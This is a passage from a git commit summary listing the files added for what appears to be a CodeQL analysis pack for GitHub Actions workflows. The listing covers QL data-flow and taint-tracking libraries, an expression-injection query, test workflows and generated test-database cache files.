| Bin 0 -> 12 bytes ql/src/test-db/db-yaml/default/folders.rel | Bin 0 -> 80 bytes .../db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/locations_default.rel | Bin 0 -> 7992 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes ql/src/test-db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes .../db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes .../db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes ql/src/test-db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes .../db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/src/test-db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/src/test-db/db-yaml/default/yaml.rel | Bin 0 -> 7992 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/yaml_locations.rel | Bin 0 -> 2664 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 3048 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes ql/src/test-db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240203T091753.298Z.json | 0 ...-diagnostics-add-20240203T091754.191Z.json | 0 .../database-create-20240203.101751.644.log | 281 +++++++++++ ...tabase-index-files-20240203.101752.962.log | 21 + ql/src/test-db/src.zip | Bin 0 -> 3816 bytes ql/src/test/changed-files.yml | 27 ++ ql/src/test/inter1.yml | 36 ++ ql/src/test/no-flow1.yml | 20 + ql/src/test/no-flow2.yml | 37 ++ ql/src/test/simple1.yml | 16 + ql/src/test/simple2.yml | 36 ++ ql/src/test/test.ql | 37 ++ ql/src/test/test.yml | 35 ++ 455 files changed, 3801 insertions(+) create mode 100755 build-dbs.sh create mode 100644 codeql-workspace.yml create mode 100644 ql/lib/actions.qll create mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/lib/codeql/Locations.qll create mode 100644 ql/lib/codeql/actions/Ast.qll create mode 100644 ql/lib/codeql/actions/Cfg.qll create mode 100644 ql/lib/codeql/actions/DataFlow.qll create mode 100644 ql/lib/codeql/actions/TaintTracking.qll create mode 100644 ql/lib/codeql/actions/ast/internal/Actions.qll create mode 100644 ql/lib/codeql/actions/ast/internal/Yaml.qll create mode 100644 ql/lib/codeql/actions/controlflow/BasicBlocks.qll create mode 100644 ql/lib/codeql/actions/controlflow/internal/Cfg.qll create mode 100644 ql/lib/codeql/actions/dataflow/FlowSources.qll create mode 100644 ql/lib/codeql/actions/dataflow/FlowSteps.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll create mode 100644 ql/lib/codeql/actions/ideContextual/IDEContextual.qll create mode 100644 ql/lib/codeql/actions/ideContextual/printAst.qll create mode 100644 ql/lib/codeql/files/FileSystem.qll create mode 100644 ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml create mode 100644 ql/lib/ide-contextual-queries/printAst.ql create mode 100644 ql/lib/ide-contextual-queries/printCfg.ql create mode 100644 ql/lib/qlpack.gbo create mode 100644 ql/lib/qlpack.yml create mode 100644 ql/lib/test-db/baseline-info.json create mode 100644 ql/lib/test-db/codeql-database.yml create mode 100644 ql/lib/test-db/db-yaml/default/cache/.lock create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/01.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/02.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/0d.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/15.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/1f.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/1f.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/29.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/2b.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/2d.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/34.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/34.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/37.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/37.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/43.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/54.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/55.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/55.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/9c.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/9c.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/a1.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b4.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b4.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b7.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/b9.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/bc.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/bc.pack.d create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/c0.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/c3.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/e0.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/f3.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/pages/fc.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/02.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/03.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/06.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/09.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/10.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/24.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/26.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2d.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2e.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/2f.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/3b.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/3c.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/53.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/5a.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/60.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/6f.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/75.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/7c.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/86.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/99.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a1.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a2.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/a8.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/bf.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/c5.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/d2.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/d4.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/e3.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/e4.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/predicates/f9.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/06.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/10.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/11.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/19.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/1e.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/2a.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/2f.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/39.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/4b.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/56.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/5c.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/6a.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/7c.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/9f.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/a0.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/ac.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/bf.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/ca.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/d3.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/e9.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/relations/f9.pack create mode 100644 ql/lib/test-db/db-yaml/default/cache/version create mode 100644 ql/lib/test-db/db-yaml/default/containerparent.rel create mode 100644 ql/lib/test-db/db-yaml/default/containerparent.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/files.rel create mode 100644 ql/lib/test-db/db-yaml/default/files.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/folders.rel create mode 100644 ql/lib/test-db/db-yaml/default/folders.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/locations_default.rel create mode 100644 ql/lib/test-db/db-yaml/default/locations_default.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/pools/0/buckets/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/0/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/0/metadata/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/buckets/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/ids1/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/indices1/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/metadata/info create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 ql/lib/test-db/db-yaml/default/pools/poolInfo create mode 100644 ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 ql/lib/test-db/db-yaml/default/yaml.rel create mode 100644 ql/lib/test-db/db-yaml/default/yaml.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/yaml_locations.rel create mode 100644 ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 ql/lib/test-db/db-yaml/default/yaml_scalars.rel create mode 100644 ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 ql/lib/test-db/db-yaml/yaml.dbscheme create mode 100644 ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json create mode 100644 ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json create mode 100644 ql/lib/test-db/log/database-create-20240203.101754.571.log create mode 100644 ql/lib/test-db/log/database-index-files-20240203.101755.239.log create mode 100644 ql/lib/test-db/src.zip create mode 100644 ql/lib/test/test.ql create mode 100644 ql/lib/test/test.yml create mode 100644 ql/lib/yaml.dbscheme create mode 100644 ql/lib/yaml.dbscheme.stats create mode 100644 ql/src/Security/CWE-094/ExpressionInjection.ql create mode 100644 ql/src/codeql-pack.lock.yml create mode 100644 ql/src/codeql-suites/actions-code-scanning.qls create mode 100644 ql/src/qlpack.yml create mode 100644 ql/src/test-db/baseline-info.json create mode 100644 ql/src/test-db/codeql-database.yml create mode 100644 ql/src/test-db/db-yaml/default/cache/.lock create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#0#e create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#1#eb create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#1#b create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#2# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-15fd6561 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-15fd6561#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-729b2108 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-729b2108#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e#0#tttttt create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-7595a81e#1#tt create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-cd159b4d create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-cd159b4d#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d2947120 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d2947120#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d8fdd114 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImpl#248dabc3--MakeImpl-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Impl-TaintTracking#f6f2598d--TaintFlow-d8fdd114#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#1#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#1#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#1#b create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#2# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b create mode 100644 